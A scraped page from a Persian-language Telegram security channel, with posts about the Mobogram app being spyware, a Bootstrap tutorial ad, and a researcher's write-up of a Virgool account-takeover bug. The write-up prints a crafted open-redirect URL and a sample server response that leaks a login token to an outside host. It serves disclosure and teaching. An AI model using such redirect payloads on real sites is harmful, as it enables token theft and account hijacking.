Network Security Channel
2.76K subscribers
5.35K photos
3.42K videos
5.59K files
4.45K links
⭕️Start Channel From 2017⭕️
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
متاسفانه #موبوگرام به صورت کامل غیر فعال شده و راهی جز پاک کردن این اپلیکیشن #جاسوس نیست...
@Engineer_Computer
Media is too big
VIEW IN TELEGRAM
چطور می‌تونستم حساب ویرگول هرکی رو هک کنم؟
یاشار شاهین‌زاده از اعضای آفسک

مهاجم با یک آسیب‌پذیری Open Redirection که در این قسمت وجود داره:

https://virgool.io/authorize?redirectedFrom=http://offsec.ir&status=login

به وبسایتی که از آن بوده برمی‌گرده و در جواب این درخواست توکن شخصی که در ویرگول لاگین بوده برمی‌گرده. با در اختیار داشتن این توکن در مقدار بازگشتی، مهاجم قادر خواهد بود آنرا جایگزین توکن خود کرده و اکانت ویرگول قربانی را تصاحب کند:

HTTP/1.1 302 Found
Server: nginx/1.15.9
...
Cache-Control: no-cache, private
Location: http://offsec.ir/authorize-token?token=sb5uevdkih3r&redirectedFrom=http://offsec.ir/&nightmode={"value":0,"userMenu":0,"active":0}
...
@Engineer_Computer
👍1
Media is too big
VIEW IN TELEGRAM
🎗تک فیلم آموزش پروژه محور
👨‍💻پیاده سازی Theme Customization
👈 0 تا 100
📍با sass & bootstrap
#bootstrap
@Engineer_Computer